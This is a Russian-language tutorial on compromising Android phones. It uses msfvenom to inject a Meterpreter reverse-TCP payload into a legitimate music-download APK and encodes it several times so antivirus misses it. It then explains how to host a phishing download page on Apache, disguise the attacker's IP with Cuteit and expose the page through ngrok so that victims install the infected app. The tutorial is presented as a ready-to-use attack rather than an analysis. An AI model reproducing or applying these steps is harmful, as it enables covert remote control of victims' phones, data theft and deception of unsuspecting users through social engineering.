Получаем доступ к android через зараженный APK

Для начала нам необходимо будет скачать какой нибудь APK файл не более 5 мб, для этого идём на 4PDA ищем там что нибудь подходящее и качаем, я использую софт для загрузки музыки из вк.

Теперь открываем терминал и прописываем:

msfvenom -x '/директория где находится файл который мы будем заражать/DownloadMusic-1.5.apk'  -p android/meterpreter/reverse_tcp LHOST=(ip вашего компа) LPORT=8080 -e x86/shikata_ga_nai -i 10 -o название итога.apk

-x - использовать такой то файл

-p - прилепить пейлоад

-o - назвать получившийся файл так-то

-e - зашифровать от обнаружения антивирусами

-i - количество "слоёв" шифрования

 

Жмём Enter и ждем когда веном либо выдаст ошибку либо скомпилирует файл.

Если выдает ошибку обновляем версию APKtool. Если не помогло ищем другую АПкашку для заражения. пишите если будут ошибки.

 

Теперь используя фишинг и социальную инженерию сделаем простенькую страничку для нашего софта.

Страничку можно создать используя конфигураторы сайтов либо использовать исходник приложеный ниже. Если вы используйте конфигуратор то знайте что он прилепит к ней вагон ненужного кода и прочий мусор.

Исходники веб-сайта (пароль от архива: social_engineering)

Содержимое папки Social по адресу /var/www/html (APK который мы заразили помещаем туда же)

 

Если не отображается картинка то необходимо предоставить доступ пользователю для чтения и записи в папке www.

Открываем файл index.html при помощи текстового редактора и исправляем все надписи на нужные вам, в часности <a href="forgo.apk">Установить</a>

forgo меняем на название вашего файла.

В терминале пишем

 sudo systemctl start apache2

Как всё запустится открываем браузер, вводим в адресную строку свой ip.

Для того что-бы наш ip стал похож на веб адресс нам понадобится программа Cuteit которую мы скачаем с гитхаба

https://github.com/D4Vinci/Cuteit.git 

там можно тупо следовать инструкции из файла readme

переходим в папку с кутитом через терминал и прописываем комманду

 python ./Cuteit.py ваш ip например 123.15.46.54

Получаем такую картину: 

 

Выбираем любую ссылку, вводим в адресную строку и попадаем на наш сервер. 

Но в адресной строке в тот же момент появляется палево в виде нашего ip.

Это мы победим при помощи Ngrok.

Прём по ссылке:

https://ngrok.com/download 

Качаем, регистрируемся и следуя инструкции добавляем ключи, иначе не будет работать как нужно.

Когда всё готово через терминал переходим в папку с Нгроком и прописываем

 sudo ./ngrok http 80

Наши рабочие ссылки в строке Forwarding

 

Готово.